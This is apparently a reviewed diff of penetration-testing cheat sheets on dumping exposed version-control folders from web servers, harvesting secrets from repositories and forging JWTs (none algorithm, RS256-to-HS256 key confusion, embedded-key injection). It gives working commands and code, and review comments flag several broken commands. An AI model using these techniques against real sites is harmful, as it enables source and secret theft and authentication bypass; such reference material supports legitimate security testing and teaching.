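Review bot: the paths in step 3 are inconsistent with the `cd test/.git` just above them. After that `cd`, `mkdir .git/object/26` creates `test/.git/.git/object/26` (and `object` is a typo for `objects`), while `mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/` targets a directory that was never created, so `git cat-file -p 26e35470...` will report a missing object. Either stay in `test/` and use `mkdir -p .git/objects/26`, or keep the `cd` and use `mkdir -p objects/26` followed by `mv e35470d38c4d6815bc4426a862d5399f04865c objects/26/`. The new comment "first byte for subdirectory, remaining bytes for filename" is correct (the first two hex characters are one byte) and is a good addition.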
@@ -59,7 +75,7 @@ Check for the following files, if they exist you can extract the .git folder.
``` ```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell ```powershell
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32 mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
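Review bot: same path problem as in step 3: `mkdir .git/object/32` misspells `objects` and, run from inside `test/.git`, creates a nested `.git/` directory instead of `objects/32`. Use `mkdir -p objects/32` and `mv 3240a3983045cdc0dec2e88c1358e7998f2e39 objects/32/` (or `.git/objects/32` if the commands are meant to be run from `test/`).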
@@ -72,22 +88,22 @@ Check for the following files, if they exist you can extract the .git folder.
``` ```
5. Read the data (flag.txt) 5. Read the data (flag.txt)
```powershell ```powershell
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
``` ```
### Recovering the content of .git/index #### Recovering file contents from .git/index
Use the git index file parser, using python3 https://pypi.python.org/pypi/gin Use the git index file parser https://pypi.python.org/pypi/gin (python3).
```powershell ```powershell
pip3 install gin pip3 install gin
gin ~/git-repo/.git/index gin ~/git-repo/.git/index
``` ```
Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file. Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
```powershell ```powershell
$ gin .git/index | egrep -e "name|sha1" $ gin .git/index | egrep -e "name|sha1"
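Review bot: in step 5 the blob is moved to the wrong directory: `mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/` places it under `32/`, but the object id starts with `cb`, so `git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f` cannot find it. The line should be `mv 6139863967a752f3402b3975e97a84d152fd8f objects/cb/` (matching the `mkdir` on the previous line, which also needs the `objects` spelling and the `.git/` prefix dropped when run from inside `test/.git`). This copy-paste error is in both the old and new side, so the rename of the section is a good moment to fix it.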
@@ -98,32 +114,44 @@ name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
``` ```
### Tools
#### Automatic recovery
### Automatic way : diggit.py ##### git-dumper.py
```powershell ```powershell
git clone https://github.com/arthaud/git-dumper
pip install -r requirements.txt
./git-dumper.py http://web.site/.git ~/website
```
##### diggit.py
```powershell
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 ./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists -u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
-o is a hash of particular Git object to download -o is a hash of particular Git object to download
``` ```
### Automatic way : GoGitDumper ##### GoGitDumper
```powershell ```powershell
go get github.com/c-sto/gogitdumper go get github.com/c-sto/gogitdumper
gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/ gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
git log git log
git checkout git checkout
``` ```
### Automatic way : rip-git ##### rip-git
```powershell ```powershell
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/" git clone https://github.com/kost/dvcs-ripper
perl rip-git.pl -v -u "http://web.site/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692 git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
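Review bot: two of the new tool blocks skip the `cd` into the cloned directory: after `git clone https://github.com/arthaud/git-dumper`, the `pip install -r requirements.txt` and `./git-dumper.py http://web.site/.git ~/website` lines only work from inside `git-dumper/`, and after `git clone https://github.com/kost/dvcs-ripper` the `perl rip-git.pl -v -u "http://web.site/.git/"` line needs `cd dvcs-ripper` (or the path to the script) first. In the GoGitDumper block, `git checkout` with no argument does nothing useful; restoring the dumped working tree is `git checkout -- .` run inside `yourdecideddir`. Also, `go get github.com/c-sto/gogitdumper` no longer installs binaries on current Go releases; `go install github.com/c-sto/gogitdumper@latest` is the equivalent.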
@@ -134,23 +162,42 @@ committer Michael <michael@easyctf.com> 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
``` ```
### Automatic way : GitHack ##### GitHack
```powershell ```powershell
git clone https://github.com/lijiejie/GitHack git clone https://github.com/lijiejie/GitHack
GitHack.py http://www.openssl.org/.git/ GitHack.py http://web.site/.git/
``` ```
### Harvesting secrets : trufflehog ##### GitTools
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history ```powershell
git clone https://github.com/internetwache/GitTools
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
git checkout -- .
```
#### Harvesting secrets
##### trufflehog
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
```powershell ```powershell
pip install truffleHog # https://github.com/dxa4481/truffleHog pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
``` ```
### Harvesting secrets : Gitrob ##### Yar
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
```powershell
go get github.com/nielsing/yar # https://github.com/nielsing/yar
yar -o orgname --both
```
##### Gitrob
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. > Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
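Review bot: the GitTools block runs `./gitdumper.sh http://target.tld/.git/ /tmp/destdir` directly after the clone, but the script lives in the `Dumper/` subdirectory of the repository, so a `cd GitTools/Dumper` is missing; the following `git checkout -- .` also has to be run inside `/tmp/destdir`, which the snippet does not show. For Yar, `go get github.com/nielsing/yar` has the same problem as GoGitDumper above and should be `go install github.com/nielsing/yar@latest` on current Go.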
@@ -160,13 +207,13 @@ export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
gitrob [options] target [target2] ... [targetN] gitrob [options] target [target2] ... [targetN]
``` ```
### Harvesting secrets - Gitleaks ##### Gitleaks
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
```powershell ```powershell
# Run gitleaks against a public repository # Run gitleaks against a public repository
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
# Run gitleaks against a local repository already cloned into /tmp/ # Run gitleaks against a local repository already cloned into /tmp/
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
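Review bot: only the heading changes here, but the two `docker run` lines below it use the pre-v8 gitleaks CLI (`-r <url>` and `--repo-path=`). On gitleaks v8 and later the equivalent is the `detect` subcommand, e.g. `gitleaks detect --source /code/gitleaks`, and a remote repository has to be cloned first. Since the section is being reorganised, either state the version these flags belong to or update them.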
@@ -179,9 +226,9 @@ or
go get -u github.com/zricethezav/gitleaks go get -u github.com/zricethezav/gitleaks
``` ```
## SVN - Source code management ## Subversion
### SVN example (Wordpress) ### Example (Wordpress)
```powershell ```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
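Review bot: worth a caveat next to the renamed example: `.svn/text-base/wp-config.php.svn-base` is the working-copy layout of Subversion 1.6 and earlier. Checkouts made with 1.7 or later keep the file contents under `.svn/pristine/<first two hex chars>/<sha1>.svn-base`, which is exactly the path construction the next section describes, so readers should try both layouts.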
@@ -194,26 +241,30 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
2. Download interesting files 2. Download interesting files
* remove \$sha1\$ prefix * remove \$sha1\$ prefix
* add .svn-base postfix * add .svn-base postfix
* use first two signs from hash as folder name inside pristine/ directory (94 in this case) * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
### Automatic way : svn-extractor ### Tools
#### svn-extractor
```powershell ```powershell
git clone https://github.com/anantshri/svn-extractor.git git clone https://github.com/anantshri/svn-extractor.git
python svn-extractor.py url "url with .svn available" python svn-extractor.py url "url with .svn available"
``` ```
## BAZAAR - Source code management ## Bazaar
### Automatic way : rip-bzr.pl ### Tools
#### rip-bzr.pl
```powershell ```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
``` ```
### Automatic way : bzr_dumper #### bzr_dumper
```powershell ```powershell
git clone https://github.com/SeahunOh/bzr_dumper git clone https://github.com/SeahunOh/bzr_dumper
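Review bot: the Bazaar command `docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u` ends without the target URL, so `-u` has no argument; append something like `http://web.site/.bzr/`. The `wget` of `rip-bzr.pl` on the line before is not used by the docker invocation (the image carries the script), so either run `perl rip-bzr.pl -v -u <url>` locally or drop the `wget`. In the svn-extractor block, the bare word `url` in `python svn-extractor.py url "url with .svn available"` reads like a leftover placeholder; please confirm against the upstream README whether the target is passed positionally or via a `--url` flag.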
@@ -238,18 +289,19 @@ $ bzr revert
N static/ N static/
``` ```
## Leaked API keys ## Mercurial
If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them. ### Tools
Twilio example : #### rip-hg.pl
```powershell ```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
``` ```
## References ## References
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) - [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/) - [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
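Review bot: the new Mercurial command `docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u` has the same defect as the Bazaar one: `-u` is missing its URL argument, and the preceding `wget` of `rip-hg.pl` is unused by the docker line. Separately, this hunk deletes the "Leaked API keys" section (the keyhacks reference and the Twilio `curl ... -u ACCOUNT_SID:AUTH_TOKEN` verification example) without a replacement; if that material moved to another page, the commit should say so and a link from here would help readers who used it.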

View File

@@ -4,16 +4,35 @@
## Summary ## Summary
- JWT Format - [Summary](#summary)
- JWT Signature - None algorithm - [Tools](#tools)
- JWT Signature - RS256 to HS256 - [JWT Format](#jwt-format)
- Breaking JWT's secret - [Header](#header)
- [Payload](#payload)
- [JWT Signature](#jwt-signature)
- [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042)
- [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644)
- [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235)
- [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431)
- [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114)
- [JWT Signature - Recover Public Key From Signed JWTs](#jwt-signature---recover-public-key-from-signed-jwts)
- [JWT Secret](#jwt-secret)
- [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret)
- [Break JWT secret](#break-jwt-secret)
- [JWT tool](#jwt-tool)
- [Hashcat](#hashcat)
- [JWT Claims](#jwt-claims)
- [JWT kid Claim Misuse](#jwt-kid-claim-misuse)
- [JWKS - jku header injection](#jwks---jku-header-injection)
- [References](#references)
## Tools ## Tools
- [jwt_tool](https://github.com/ticarpi/jwt_tool) - [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
- [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) - [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
- [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61) - [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61)
- [jwt.io - Encoder Decoder](https://jwt.io/)
## JWT Format ## JWT Format
@@ -31,8 +50,8 @@ UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY # signature
### Header ### Header
Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). Registered header parameter names defined in [JSON Web Signature (JWS) RFC](https://www.rfc-editor.org/rfc/rfc7515).
"RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature). The most basic JWT header is the following JSON.
```json ```json
{ {
@@ -41,6 +60,45 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
} }
``` ```
Other parameters are registered in the RFC.
| Parameter | Definition | Description |
|-----------|--------------------------------------|-------------|
| alg | Algorithm | Identifies the cryptographic algorithm used to secure the JWS |
| jku | JWK Set URL | Refers to a resource for a set of JSON-encoded public keys |
| jwk | JSON Web Key | The public key used to digitally sign the JWS |
| kid | Key ID | The key used to secure the JWS |
| x5u | X.509 URL | URL for the X.509 public key certificate or certificate chain |
| x5c | X.509 Certificate Chain | X.509 public key certificate or certificate chain in PEM-encoded used to digitally sign the JWS |
| x5t | X.509 Certificate SHA-1 Thumbprint) | Base64 url-encoded SHA-1 thumbprint (digest) of the DER encoding of the X.509 certificate |
| x5t#S256 | X.509 Certificate SHA-256 Thumbprint | Base64 url-encoded SHA-256 thumbprint (digest) of the DER encoding of the X.509 certificate |
| typ | Type | Media Type. Usually `JWT` |
| cty | Content Type | This header parameter is not recommended to use |
| crit | Critical | Extensions and/or JWA are being used |
Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
"RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature).
| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements |
|-------|------------------------------------------------|---------------|
| HS256 | HMAC using SHA-256 | Required |
| HS384 | HMAC using SHA-384 | Optional |
| HS512 | HMAC using SHA-512 | Optional |
| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended |
| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional |
| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional |
| ES256 | ECDSA using P-256 and SHA-256 | Recommended |
| ES384 | ECDSA using P-384 and SHA-384 | Optional |
| ES512 | ECDSA using P-521 and SHA-512 | Optional |
| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional |
| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional |
| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional |
| none | No digital signature or MAC performed | Required |
Inject headers with [ticarpi/jwt_tool](#): `python3 jwt_tool.py JWT_HERE -I -hc header1 -hv testval1 -hc header2 -hv testval2`
### Payload ### Payload
```json ```json
@@ -61,55 +119,81 @@ Claims are the predefined keys and their values:
- sub: subject of the token (rarely used) - sub: subject of the token (rarely used)
- aud: audience of the token (also rarely used) - aud: audience of the token (also rarely used)
JWT Encoder Decoder: `http://jsonwebtoken.io` Inject payload claims with [ticarpi/jwt_tool](#): `python3 jwt_tool.py JWT_HERE -I -pc payload1 -pv testval3`
## JWT Signature - None algorithm
JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. ## JWT Signature
To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. ### JWT Signature - Null Signature Attack (CVE-2020-28042)
However, this won't work unless you **remove** the signature Send a JWT with HS256 algorithm without a signature like `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.`
The following code is a basic test for a None algorithm. **Exploit**:
```ps1
```python python3 jwt_tool.py JWT_HERE -X n
import jwt
import base64
def b64urlencode(data):
return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
'.' + b64urlencode("{\"data\":\"test\"}") + '.'
``` ```
**Deconstructed**:
```json
{"alg":"HS256","typ":"JWT"}.
{"sub":"1234567890","name":"John Doe","iat":1516239022}
```
### JWT Signature - Disclosure of a correct signature (CVE-2019-7644)
Send a JWT with an incorrect signature, the endpoint might respond with an error disclosing the correct one.
* [jwt-dotnet/jwt: Critical Security Fix Required: You disclose the correct signature with each SignatureVerificationException... #61](https://github.com/jwt-dotnet/jwt/issues/61)
* [CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT](https://auth0.com/docs/secure/security-guidance/security-bulletins/cve-2019-7644)
```
Invalid signature. Expected SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c got 9twuPVu9Wj3PBneGw1ctrf3knr7RX12v-UwocfLhXIs
Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo=
```
### JWT Signature - None Algorithm (CVE-2015-9235)
JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
None algorithm variants:
* none
* None
* NONE
* nOnE
To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature
Alternatively you can modify an existing JWT (be careful with the expiration time) Alternatively you can modify an existing JWT (be careful with the expiration time)
```python * Using [ticarpi/jwt_tool](#)
#!/usr/bin/python ```ps1
# -*- coding: utf-8 -*- python3 jwt_tool.py [JWT_HERE] -X a
```
jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ" * Manually editing the JWT
header, payload, signature = jwt.split('.') ```python
import jwt
# Replacing the ALGO and the payload username jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ'
header = header.decode('base64').replace('HS256',"none") decodedToken = jwt.decode(jwtToken, verify=False)
payload = (payload+"==").decode('base64').replace('test','admin')
header = header.encode('base64').strip().replace("=","") # decode the token before encoding with type 'None'
payload = payload.encode('base64').strip().replace("=","") noneEncoded = jwt.encode(decodedToken, key='', algorithm=None)
# 'The algorithm 'none' is not supported' print(noneEncoded.decode())
print( header+"."+payload+".") ```
```
## JWT Signature - RS256 to HS256
Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data. ### JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)
> The algorithm HS256 uses the secret key to sign and verify each message. If a servers code is expecting a token with "alg" set to RSA, but receives a token with "alg" set to HMAC, it may inadvertently use the public key as the HMAC symmetric key when verifying the signature.
> The algorithm RS256 uses the private key to sign the message and uses the public key for authentication.
Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data. When the applications use the same RSA key pair as their TLS web server: `openssl s_client -connect example.com:443 | openssl x509 -pubkey -noout`
> The algorithm **HS256** uses the secret key to sign and verify each message.
> The algorithm **RS256** uses the private key to sign the message and uses the public key for authentication.
```python ```python
import jwt import jwt
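Review bot: the "Manually editing the JWT" snippet only runs on PyJWT 1.x. `jwt.decode(jwtToken, verify=False)` is ignored on PyJWT 2.x (which then fails because `algorithms` is required when verification is on), and `encode()` returns a `str` there, so `noneEncoded.decode()` raises `AttributeError`. Use `jwt.decode(jwtToken, options={"verify_signature": False})` and `print(noneEncoded)`, or pin the version the way the RS256 section does with `pip install pyjwt==0.4.3`. Also, the one-liner `openssl s_client -connect example.com:443 | openssl x509 -pubkey -noout` blocks waiting on stdin; redirect it, e.g. `openssl s_client -connect example.com:443 </dev/null 2>/dev/null | openssl x509 -pubkey -noout`.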
@@ -118,45 +202,136 @@ print public
print jwt.encode({"data":"test"}, key=public, algorithm='HS256') print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
``` ```
Note: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version :warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version: `pip install pyjwt==0.4.3`.
`pip install pyjwt==0.4.3`. * Using [ticarpi/jwt_tool](#)
```ps1
python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem
```
* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json`
2. Load it in the JWT Editor Keys tab, click `New RSA Key`.
3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}`
4. Select the PEM radio button and copy the resulting PEM key.
5. Go to the Decoder tab and Base64-encode the PEM.
6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format.
7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied.
8. Edit the JWT token alg to `HS256` and the data.
9. Click `Sign` and keep the option: `Don't modify header`
## Breaking JWT's secret * Manually using the following steps to edit an RS256 JWT token into an HS256
1. Convert our public key (key.pem) into HEX with this command.
Encode/Decode JWT with the secret. ```powershell
$ cat key.pem | xxd -p | tr -d "\\n"
2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
```
```python 2. Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited.
import jwt
encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') # encode with 'secret'
encoded = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE" ```powershell
jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the secret key $ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
# result (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0
{u'admin': True, u'sub': u'1234567890', u'name': u'John Doe'} ```
3. Convert signature (Hex to "base64 URL")
```powershell
$ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0')).replace('=','')\")"
```
4. Add signature to edited payload
```powershell
[HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE]
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ.j0IbNR62H_Im34jVJqfpubt7gjlojB-GLyYaDFiJEOA
```
### JWT Signature - Key Injection Attack (CVE-2018-0114)
> A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Signature (JWS) standard for JSON Web Tokens (JWTs). This standard specifies that a JSON Web Key (JWK) representing a public key can be embedded within the header of a JWS. This public key is then trusted for verification. An attacker could exploit this by forging valid JWS objects by removing the original signature, adding a new public key to the header, and then signing the object using the (attacker-owned) private key associated with the public key embedded in that JWS header.
**Exploit**:
* Using [ticarpi/jwt_tool]
```ps1
python3 jwt_tool.py [JWT_HERE] -X i
```
* Using [portswigger/JWT Editor](#)
1. Add a `New RSA key`
2. In the JWT's Repeater tab, edit data
3. `Attack` > `Embedded JWK`
**Deconstructed**:
```json
{
"alg": "RS256",
"typ": "JWT",
"jwk": {
"kty": "RSA",
"kid": "jwt_tool",
"use": "sig",
"e": "AQAB",
"n": "uKBGiwYqpqPzbK6_fyEp71H3oWqYXnGJk9TG3y9K_uYhlGkJHmMSkm78PWSiZzVh7Zj0SFJuNFtGcuyQ9VoZ3m3AGJ6pJ5PiUDDHLbtyZ9xgJHPdI_gkGTmT02Rfu9MifP-xz2ZRvvgsWzTPkiPn-_cFHKtzQ4b8T3w1vswTaIS8bjgQ2GBqp0hHzTBGN26zIU08WClQ1Gq4LsKgNKTjdYLsf0e9tdDt8Pe5-KKWjmnlhekzp_nnb4C2DMpEc1iVDmdHV2_DOpf-kH_1nyuCS9_MnJptF1NDtL_lLUyjyWiLzvLYUshAyAW6KORpGvo2wJa2SlzVtzVPmfgGW7Chpw"
}
}.
{"login":"admin"}.
[Signed with new Private key; Public key injected]
``` ```
### JWT tool
First, bruteforce the "secret" key used to compute the signature. ### JWT Signature - Recover Public Key From Signed JWTs
The RS256, RS384 and RS512 algorithms use RSA with PKCS#1 v1.5 padding as their signature scheme. This has the property that you can compute the public key given two different messages and accompanying signatures.
[SecuraBV/jws2pubkey](https://github.com/SecuraBV/jws2pubkey): compute an RSA public key from two signed JWTs
```ps1
$ docker run -it ttervoort/jws2pubkey JWS1 JWS2
$ docker run -it ttervoort/jws2pubkey "$(cat sample-jws/sample1.txt)" "$(cat sample-jws/sample2.txt)" | tee pubkey.jwk
Computing public key. This may take a minute...
